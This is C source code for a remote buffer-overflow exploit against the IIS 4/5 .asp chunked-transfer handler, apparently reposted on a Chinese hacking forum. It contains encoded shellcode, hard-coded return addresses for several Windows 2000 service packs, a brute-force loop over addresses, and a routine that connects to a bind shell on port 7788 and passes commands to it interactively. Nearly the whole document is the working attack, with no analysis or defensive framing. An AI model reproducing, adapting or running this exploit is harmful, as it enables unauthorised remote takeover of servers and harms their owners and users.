/*
* DDK - 2k2 -
*
*
* coded by NeMeS||y tnx to Birdack
*
*
*/
// IIS 4(NT4) - IIS 5(2K) .asp bof
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>
#define RET_BRUTE_START 0x00400000
#define RET_BRUTE_STOP 0x00500000
#define PORT_BIND 7788
#define VERSION "0.3b"
unsigned char wincode[] =
"\xeb\x18\x5f\x57\x5e\x33\xc9\xac\x3a\xc1\x74\x13\x3c\x30\x74\x05"
"\x34\xaa\xaa\xeb\xf2\xac\x2c\x40\xeb\xf6\xe8\xe3\xff\xff\xff\xff"
"\x21\x46\x30\x6b\x46\xea\xa3\xaa\xaa\xf9\xfc\xfd\x27\x17\x6a\x30"
"\x9c\x55\x55\x13\xfa\xa8\xaa\xaa\x12\x66\x66\x66\x66\x59\x30\x41"
"\x6d\x30\x6f\x30\x46\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x30\x6f\x9e"
"\x5d\x55\x55\xba\xaa\xaa\xaa\x43\x48\xac\xaa\xaa\x30\x65\x30\x6f"
"\x30\x42\x5d\x55\x55\x27\x17\x5e\x5d\x55\x55\xce\x30\x4b\xaa\xaa"
"\xaa\xaa\x23\xed\xa2\xce\x23\x97\xaa\xaa\xaa\xaa\x6d\x30\x6f\x5e"
"\x5d\x55\x55\x55\x55\x55\x55\x21\x30\x6f\x30\x42\x5d\x55\x55\x29"
"\x42\xad\x23\x30\x6f\x52\x5d\x55\x55\x6d\x30\x6f\x30\x4e\x5d\x55"
"\x55\xaa\xaa\x4a\xdd\x42\xd4\xac\xaa\xaa\x29\x17\x30\x46\x5d\x55"
"\x55\xaa\xa5\x30\x6f\x77\xab\xaa\xaa\x21\x27\x30\x4e\x5d\x55\x55"
"\x30\x6b\x6b\xaa\xaa\xab\xaa\x23\x27\x30\x4e\x5d\x55\x55\x30\x6b"
"\x17\x30\x4e\x5d\x55\x55\xaa\xaa\xaa\xd2\xdf\xa0\x6d\x30\x6f\x30"
"\x4e\x5d\x55\x55\xaa\xaa\x5a\x15\x21\x30\x7f\x30\x4e\x5d\x55\x55"
"\x99\x6a\xcc\x21\xa8\x97\xe7\xf0\xaa\xaa\xa5\x30\x6f\x30\x70\xab"
"\xaa\xaa\x21\x27\x30\x4e\x5d\x55\x55\x21\xfb\x96\x21\x30\x6f\x30"
"\x4e\x5d\x55\x55\x99\x63\xcc\x21\xa6\xba\x30\x6b\x53\xfa\xef\xaa"
"\xaa\xa5\x30\x6f\xd3\xab\xaa\xaa\x21\x30\x7f\x30\x4e\x5d\x55\x55"
"\x21\xe8\x96\x21\x27\x30\x4e\x5d\x55\x55\x21\xfe\xab\xd2\xa9\x30"
"\x7f\x30\x4e\x5d\x55\x55\x23\x30\x7f\x30\x4a\x5d\x55\x55\x21\x30"
"\x6f\x30\x4a\x5d\x55\x55\x21\xe2\xa6\xa9\x27\x30\x4e\x5d\x55\x55"
"\x23\x27\x36\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\x30\x6b\x90"
"\xe1\xef\xf8\xe4\xa5\x30\x6f\x99\xab\xaa\xaa\x21\x30\x6f\x36\x5d"
"\x55\x55\x30\x6b\xd2\xae\xef\xe6\x99\x98\xa5\x30\x6f\x8a\xab\xaa"
"\xaa\x21\x27\x30\x4e\x5d\x55\x55\x23\x27\x3e\x5d\x55\x55\x21\x30"
"\x7f\x30\x4a\x5d\x55\x55\x21\x30\x6f\x30\x4e\x5d\x55\x55\xa9\xe8"
"\x8a\x23\x30\x6f\x36\x5d\x55\x55\x6d\x30\x6f\x32\x5d\x55\x55\xaa"
"\xaa\xaa\xaa\x41\xb4\x21\x27\x32\x5d\x55\x55\x29\x6b\xab\x23\x27"
"\x32\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\x29\x68\xae\x23\x30"
"\x7f\x36\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d\x55\x55\x21\x27\x32"
"\x5d\x55\x55\x91\xe2\xb2\xa5\x27\x6a\xaa\xaa\xaa\x21\x30\x7f\x36"
"\x5d\x55\x55\x21\xa8\x21\x27\x30\x4e\x5d\x55\x55\x30\x6b\x96\xab"
"\xed\xcf\xde\xfa\xa5\x30\x6f\x30\x4a\xaa\xaa\xaa\x21\x30\x7f\x36"
"\x5d\x55\x55\x21\xa8\x21\x27\x30\x4e\x5d\x55\x55\x30\x6b\xd6\xab"
"\xae\xd8\xc5\xc9\xeb\xa5\x30\x6f\x30\x6e\xaa\xaa\xaa\x21\x30\x7f"
"\x32\x5d\x55\x55\xa9\x30\x7f\x32\x5d\x55\x55\xa9\x30\x7f\x30\x4e"
"\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d\x55\x55\x21\xe2\x8e\x99\x6a"
"\xcc\x21\xae\xa0\x23\x30\x6f\x36\x5d\x55\x55\x21\x27\x30\x4a\x5d"
"\x55\x55\x21\xfb\xba\x21\x30\x6f\x36\x5d\x55\x55\x27\xe6\xba\x55"
"\x23\x27\x36\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\xa9\x30\x7f"
"\x36\x5d\x55\x55\xa9\x30\x7f\x36\x5d\x55\x55\xa9\x30\x7f\x36\x5d"
"\x55\x55\xa9\x30\x7f\x30\x4e\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d"
"\x55\x55\x21\xe2\xb6\x21\xbe\xa0\x23\x30\x7f\x36\x5d\x55\x55\x21"
"\x30\x6f\x36\x5d\x55\x55\xa9\x30\x6f\x30\x4e\x5d\x55\x55\x23\x30"
"\x6f\x30\x46\x5d\x55\x55\x41\xaf\x43\xa7\x55\x55\x55\x43\xbc\x54"
"\x55\x55\x27\x17\x5e\x5d\x55\x55\x21\xed\xa2\xce\x30\x49\xaa\xaa"
"\xaa\xaa\x29\x17\x30\x46\x5d\x55\x55\xaa\xdf\xaf\x43\xdf\xae\xaa"
"\xaa\x21\x27\x30\x42\x5d\x55\x55\xcc\x21\xbb\xcc\x23\x30\x7f\x86"
"\x5d\x55\x55\x21\x30\x6f\x30\x42\x5d\x55\x55\x29\x6a\xa8\x23\x30"
"\x6f\x30\x42\x5d\x55\x55\x6d\x30\x6f\x36\x5d\x55\x55\xab\xaa\xaa"
"\xaa\x41\xa5\x21\x27\x36\x5d\x55\x55\x29\x6b\xab\x23\x27\x36\x5d"
"\x55\x55\x29\x17\x36\x5d\x55\x55\xbb\xa5\x27\x30\x7f\xaa\xaa\xaa"
"\x29\x17\x36\x5d\x55\x55\xa2\xdf\xb4\x21\x5e\x21\x30\x7f\x30\x42"
"\x5d\x55\x55\xf8\x55\x30\x7f\x1e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
"\xe9\xe1\x23\x30\x6f\x3e\x5d\x55\x55\x41\x80\x21\x5e\x21\x30\x6f"
"\x30\x42\x5d\x55\x55\xfa\x21\x27\x3e\x5d\x55\x55\xfb\x55\x30\x7f"
"\x30\x46\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x21\x30\x7f\x36"
"\x5d\x55\x55\x23\x30\x6e\x30\x7f\x1a\x5d\x55\x55\x41\xa5\x21\x30"
"\x6f\x30\x42\x5d\x55\x55\x29\x6a\xab\x23\x30\x6f\x30\x42\x5d\x55"
"\x55\x21\x27\x30\x42\x5d\x55\x55\xa5\x14\xbb\x30\x6f\x78\xdf\xba"
"\x21\x30\x6f\x30\x42\x5d\x55\x55\xa5\x14\xe2\xab\x30\x6f\x63\xde"
"\xa8\x41\xa8\x41\x78\x21\x30\x7f\x30\x42\x5d\x55\x55\x29\x68\xab"
"\x23\x30\x7f\x30\x42\x5d\x55\x55\x43\xe5\x55\x55\x55\x21\x5e\xc0"
"\xac\xc0\xab\xc0\xa8\x55\x30\x7f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9"
"\xe1\xe9\xe1\x23\x30\x6f\xe6\x5d\x55\x55\xcc\x6d\x30\x6f\x92\x5d"
"\x55\x55\xa8\xaa\xcc\x21\x30\x6f\x86\x5d\x55\x55\xcc\x23\x30\x6f"
"\x90\x5d\x55\x55\x6d\x30\x6f\x96\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d"
"\x30\x6f\x36\x5d\x55\x55\xab\xaa\xaa\xaa\x29\x17\x36\x5d\x55\x55"
"\xaa\xde\xf5\x21\x5e\xc0\xba\x27\x27\x92\x5d\x55\x55\xfb\x21\x30"
"\x7f\xe6\x5d\x55\x55\xf8\x55\x30\x7f\x72\x5d\x55\x55\x91\x5e\x3a"
"\xe9\xe1\xe9\xe1\x23\x30\x6f\x36\x5d\x55\x55\xcc\x21\x30\x6f\x90"
"\x5d\x55\x55\xcc\xaf\xaa\xab\xcc\x23\x30\x6f\x90\x5d\x55\x55\x21"
"\x27\x90\x5d\x55\x55\x30\x6b\x4b\x55\x55\xaa\xaa\x30\x6b\x53\xaa"
"\xab\xaa\xaa\xd7\xb8\xcc\x21\x30\x7f\x90\x5d\x55\x55\xcc\x29\x68"
"\xab\xcc\x23\x30\x7f\x90\x5d\x55\x55\x41\x32\x21\x5e\xc0\xa0\x21"
"\x30\x6f\xe6\x5d\x55\x55\xfa\x55\x30\x7f\x76\x5d\x55\x55\x91\x5e"
"\x3a\xe9\xe1\xe9\xe1\x13\xab\xaa\xaa\xaa\x30\x6f\x63\xa5\x30\x6e"
"\x6c\xa8\xaa\xaa\x21\x5e\x27\x30\x7f\x9e\x5d\x55\x55\xf8\x27\x30"
"\x6f\x92\x5d\x55\x55\xfa\x21\x27\xe6\x5d\x55\x55\xfb\x55\x30\x7f"
"\x4a\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x30\x6f\xe2\x5d"
"\x55\x55\x6d\x30\x6f\xaa\x5d\x55\x55\xa6\xaa\xaa\xaa\x6d\x30\x6f"
"\xae\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x30\x6f\xa2\x5d\x55\x55\xab"
"\xaa\xaa\xaa\x21\x5e\xc0\xaa\x27\x30\x7f\xaa\x5d\x55\x55\xf8\x27"
"\x30\x6f\xbe\x5d\x55\x55\xfa\x27\x27\xb2\x5d\x55\x55\xfb\x55\x30"
"\x7f\x12\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x21\x5e\xc0\xaa"
"\x27\x30\x7f\xaa\x5d\x55\x55\xf8\x27\x30\x6f\xa6\x5d\x55\x55\xfa"
"\x27\x27\xba\x5d\x55\x55\xfb\x55\x30\x7f\x12\x5d\x55\x55\x91\x5e"
"\x3a\xe9\xe1\xe9\xe1\x27\x17\xfa\x5d\x55\x55\x99\x6a\x13\xbb\xaa"
"\xaa\xaa\x58\x30\x41\x6d\x30\x6f\xd6\x5d\x55\x55\xab\xab\xaa\xaa"
"\xcc\x6d\x30\x6f\x2a\x5d\x55\x55\xaa\xaa\x21\x30\x7f\xba\x5d\x55"
"\x55\x23\x30\x7f\x22\x5d\x55\x55\x21\x30\x6f\xbe\x5d\x55\x55\x23"
"\x30\x6f\x26\x5d\x55\x55\x21\x27\xbe\x5d\x55\x55\x23\x27\x3a\x5d"
"\x55\x55\x21\x5e\x27\x30\x7f\xb6\x5d\x55\x55\xf8\x27\x30\x6f\xfa"
"\x5d\x55\x55\xfa\xc0\xaa\xc0\xaa\xc0\xaa\xc0\xab\xc0\xaa\xc0\xaa"
"\x21\x27\x30\x42\x5d\x55\x55\xfb\xc0\xaa\x55\x30\x7f\x16\x5d\x55"
"\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x30\x6f\x36\x5d\x55\x55\x21"
"\x5e\xc0\xaa\xc0\xaa\x27\x30\x7f\x9a\x5d\x55\x55\xf8\xc2\xaa\xae"
"\xaa\xaa\x27\x30\x6f\xaa\x52\x55\x55\xfa\x21\x27\xb2\x5d\x55\x55"
"\xfb\x55\x30\x7f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x30"
"\x50\xab\xaa\xaa\xaa\x30\x6f\x78\xa5\x30\x6e\xdf\xab\xaa\xaa\x21"
"\x5e\xc0\xaa\xc0\xaa\x27\x30\x6f\x9a\x5d\x55\x55\xfa\xc2\xaa\xae"
"\xaa\xaa\x27\x27\xaa\x52\x55\x55\xfb\x21\x30\x7f\xb2\x5d\x55\x55"
"\xf8\x55\x30\x7f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29"
"\x17\x9a\x5d\x55\x55\xaa\xa5\x24\x30\x6e\xaa\xaa\xaa\x21\x5e\xc0"
"\xaa\x27\x30\x6f\x9a\x5d\x55\x55\xfa\x21\x27\x9a\x5d\x55\x55\xfb"
"\x27\x30\x7f\xaa\x52\x55\x55\xf8\x21\x30\x6f\xb2\x5d\x55\x55\xfa"
"\x55\x30\x7f\x62\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29\x17"
"\x9a\x5d\x55\x55\xaa\xd4\x82\x21\x5e\xc0\xaa\x21\x27\x9a\x5d\x55"
"\x55\xfb\x27\x30\x7f\xaa\x52\x55\x55\xf8\x21\x30\x6f\xe2\x5d\x55"
"\x55\xfa\x55\x30\x7f\x4e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1"
"\x41\x8b\x21\x5e\xc0\xaa\xc0\xa2\x21\x27\x30\x42\x5d\x55\x55\xfb"
"\x21\x30\x7f\xe2\x5d\x55\x55\xf8\x55\x30\x7f\x4e\x5d\x55\x55\x91"
"\x5e\x3a\xe9\xe1\xe9\xe1\x43\x18\xaa\xaa\xaa\x21\x5e\xc0\xaa\xc2"
"\xaa\xae\xaa\xaa\x27\x30\x6f\xaa\x52\x55\x55\xfa\x21\x27\xe2\x5d"
"\x55\x55\xfb\x55\x30\x7f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9"
"\xe1\x23\x30\x6f\x9a\x5d\x55\x55\x29\x17\x9a\x5d\x55\x55\xaa\xd5"
"\xf8\x6d\x30\x6f\x9a\x5d\x55\x55\xac\xaa\xaa\xaa\x21\x5e\xc0\xaa"
"\x27\x30\x7f\x9a\x5d\x55\x55\xf8\x21\x30\x6f\x9a\x5d\x55\x55\xfa"
"\x21\x27\x30\x42\x5d\x55\x55\x29\x6b\xa2\xfb\x21\x30\x7f\xa6\x5d"
"\x55\x55\xf8\x55\x30\x7f\x66\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9"
"\xe1\x21\x5e\x21\x30\x6f\xe2\x5d\x55\x55\xfa\x55\x30\x7f\x5a\x5d"
"\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x41\x98\x21\x5e\xc0\xaa\x27"
"\x27\x9a\x5d\x55\x55\xfb\x21\x30\x7f\x9a\x5d\x55\x55\xf8\x27\x30"
"\x6f\xaa\x52\x55\x55\xfa\x21\x27\xa6\x5d\x55\x55\xfb\x55\x30\x7f"
"\x66\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\xd4\x54\x55\x55"
"\x43\x87\x57\x55\x55\x41\x54\xf2\xfa\x21\x17\x30\x42\x5d\x55\x55"
"\x23\xed\x58\x69\x21\xee\x8e\xa6\xaf\x12\xaa\xaa\xaa\x6d\xaa\xee"
"\x99\x88\xbb\x99\x6a\x69\x41\x46\x42\xb3\x53\x55\x55\xb4\xc6\xe6"
"\xc5\xcb\xce\xe6\xc3\xc8\xd8\xcb\xd8\xd3\xeb\xaa\xe9\xd8\xcf\xcb"
"\xde\xcf\xfa\xc3\xda\xcf\xaa\xe9\xd8\xcf\xcb\xde\xcf\xfa\xd8\xc5"
"\xc9\xcf\xd9\xd9\xeb\xaa\xe9\xc6\xc5\xd9\xcf\xe2\xcb\xc4\xce\xc6"
"\xcf\xaa\xfa\xcf\xcf\xc1\xe4\xcb\xc7\xcf\xce\xfa\xc3\xda\xcf\xaa"
"\xf8\xcf\xcb\xce\xec\xc3\xc6\xcf\xaa\xfd\xd8\xc3\xde\xcf\xec\xc3"
"\xc6\xcf\xaa\xdd\xd9\xc5\xc9\xc1\x99\x98\x84\xce\xc6\xc6\xaa\xd9"
"\xc5\xc9\xc1\xcf\xde\xaa\xc8\xc3\xc4\xce\xaa\xc6\xc3\xd9\xde\xcf"
"\xc4\xaa\xcb\xc9\xc9\xcf\xda\xde\xaa\xd9\xcf\xc4\xce\xaa\xd8\xcf"
"\xc9\xdc\xaa\xc3\xc5\xc9\xde\xc6\xd9\xc5\xc9\xc1\xcf\xde\xaa\xc9"
"\xc6\xc5\xd9\xcf\xd9\xc5\xc9\xc1\xcf\xde\xaa\xc9\xc7\xce\x84\xcf"
"\xd2\xcf\xaa\xcf\xd2\xc3\xde\xa7\xa0\xaa";
struct{
int def;
char *descr;
unsigned int ret;
unsigned int rewrite;
int port;
char path[256];
}target[] = {
{0, " IIS5 Windows 2000 by hsj", 0x0045C560, 0x77eaf44c, 80, "/iisstart.asp"},
{1, " IIS5 Windows 2000 Chinese SP0 - SP1", 0x0045C560, 0x77ec044c, 80, "/iisstart.asp"},
{2, " IIS5 Windows 2000 Chinese SP2", 0x0045C560, 0x77ebf44c, 80, "/iisstart.asp"},
{3, " IIS5 Windows 2000 English SP2", 0x0045C560, 0x77edf44c, 80, "/iisstart.asp"},
{4, " IIS4 Windows NT4", 0, 0, 80, "/iisstart.asp"},
{666, NULL, 0, 0, 0, NULL}
};
int sel = 0;
int resolve (char *IP);
int make_connection(char *address,int port);
int open_back(char *host,int port);
void l33thax0r(int sock);
void usage(char *name);
int main(int argc, char **argv)
{
int i, j, cnt, sock;
int brute = 0;
unsigned int step;
unsigned char *shell_port_offset;
char buf[8192], buf2[16384], host[1024];
unsigned int ret_start, ret_stop, ret_step, ret_1;
fprintf(stderr, "\n IIS4(NT4) - IIS5(2K) .asp buffer overflow remote exploit "
"- DDK Crew 2k2 - (version "VERSION")\n"
" by NeMeS||y and Birdack\n\n");
if(argc == 1) usage(argv[0]);
while((cnt = getopt(argc,argv,"h:t:p:f:b:")) != EOF)
{
switch(cnt)
{
case 'h':
strncpy(host, optarg, sizeof(host));
host[sizeof(host) - 1] = '\x00';
break;
case 't':
sel = atoi(optarg);
break;
case 'p':
sscanf(optarg, "%p", &target[sel].port);
break;
case 'f':
strncpy(target[sel].path, optarg, sizeof(&target[sel].path));
target[sel].path[sizeof(&target[sel].path) -1] = '\x00';
break;
case 'b':
brute = 1;
step = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if(target[sel].def == 4) brute = 1; // ;>
sock = make_connection(host,target[sel].port);
if(sock<0)
{
printf("Error -> [ %d ] not connected.\n\n",sock);
return -3;
}
if(brute==0)
{
ret_start = target[sel].ret;
ret_step = 1;
ret_stop = target[sel].ret;
} else {
ret_start = RET_BRUTE_START;
ret_step = step;
ret_stop = RET_BRUTE_STOP;
}
printf("\n [+] Start\n\n host\t->\t%s\n port\t->\t%d\n path\t->\t%s\n type\t->\t%s\n\n\n",
host, target[sel].port, target[sel].path, target[sel].descr);
if(brute==1) printf("\n [+] Brute forcing enabled... do u have time?\n\n");
for(ret_1 = ret_start; ret_1 <= ret_stop; ret_1 += ret_step)
{
for(i=0;i<sizeof(buf)-strlen(wincode)-12-1;)
{
buf[i++] = 0xeb;
buf[i++] = 0x06;
}
*(unsigned int *)&buf[i] = 0x41414141;
*(unsigned int *)&buf[i+4] = 0x41414141;
*(unsigned int *)&buf[i+8] = 0x41414141;
memcpy(&buf[sizeof(buf)-strlen(wincode)-1],wincode,strlen(wincode));
buf[sizeof(buf)-1] = 0;
sprintf(buf2,"POST %s?%s HTTP/1.0\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Transfer-Encoding: chunked\r\n\r\n"
"10\r\nDDKDDKDDKDDKDD\r\n"
"4\r\nRETT\r\n"
"4\r\nREWR\r\n"
"0\r\n\r\n\r\n",
&target[sel].path,buf);
*(unsigned int *)strstr(buf2,"REWR") = &target[sel].rewrite;
*(unsigned int *)strstr(buf2,"RETT") = ret_1;
if(brute==0) printf(" # Sending buffer to socket : ");
write(sock,buf2,strlen(buf2));
fprintf(stderr, " [+] ret : 0x%08lx ->",ret_1);
sleep(3);
if(brute==0) printf("DONE!\n\n");
shutdown(sock,2);
close(sock);
printf(" # connecting to our shell - port : [ %d ]\n",PORT_BIND);
sock=open_back(host,PORT_BIND);
if(sock==-1 && brute==0)
{
printf("\n [-] FAILED ");
printf("exiting now!\n\n");
exit(-1);
}
if(sock!=-1)
{
printf("\n\n[+] Address guessed!! \n\n");
printf("...OH oH OH... done! our evilcode has worked baby at [ %d ]\n", ret_1);
l33thax0r(sock);
exit(0);
}
}
}
int resolve (char *IP)
{
struct hostent *info;
unsigned long ip;
if ((ip=inet_addr(IP))==-1)
{
if ((info=gethostbyname(IP))==0)
{
printf("Couldnt resolve [%s]\n", IP);
exit(0);
}
memcpy(&ip, (info->h_addr), 4);
}
return (ip);
}
int make_connection(char *address,int port)
{
struct sockaddr_in server,target;
int s,i,bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
memset((char *)&server,0,sizeof(server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl(INADDR_ANY);
server.sin_port = 0;
target.sin_family = AF_INET;
target.sin_addr.s_addr = resolve(address);
if(target.sin_addr.s_addr==0)
{
close(s);
return -2;
}
target.sin_port = htons(port);
bf = 1;
ioctl(s,FIONBIO,&bf);
tv.tv_sec = 10;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
close(s);
return -3;
}
if(i==0)
{
close(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
close(s);
errno = bf;
return -5;
}
ioctl(s,FIONBIO,&bf);
return s;
}
int open_back(char *host,int port)
{
int sock, err;
struct sockaddr_in server_addr;
struct hostent *he;
he=gethostbyname(host);
if (he == NULL) return -1;
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons (port);
server_addr.sin_addr.s_addr = resolve(host);
sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock == -1) return -1;
err = connect(sock, (struct sockaddr *)&server_addr, sizeof(server_addr));
if (err == -1) sock = -1;
return sock;
}
void l33thax0r(int sock)
{
char buf[1024];
fd_set rset;
int i;
while (1)
{
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(sock,&rset))
{
i=read(sock,buf,1024);
if (i <= 0)
{
printf("Fuck... the connection was closed!\n");
printf("exiting...\n\n");
exit(0);
}
buf[i]=0;
puts(buf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
i=read(STDIN_FILENO,buf,1024);
if (i>0)
{
buf[i]=0;
write(sock,buf,i);
}
}
}
}
void usage(char *name)
{
int j = 0;
printf("Usage: %s <-h hostname> <-t target> [-p port] [-f path file] [-b step]\n", name);
printf("\nOptions:\n"
" -h hostname (www.iisvictim.com)\n"
" -t target\n"
" -p port (default 80)\n"
" -f path_file (default /iisstart.asp)\n"
" -b step (brute force, try step 2000)\n\n"
"Available targets:\n\n");
while(target[j].def != 666)
{
printf(" %d ] - %s -\n", target[j].def, target[j].descr);
j++;
}
printf("\n");
exit(1);
}
论坛用户
版主
论坛用户
论坛: 黑客进阶 标题: ISAPIasp映射缓冲区溢出问题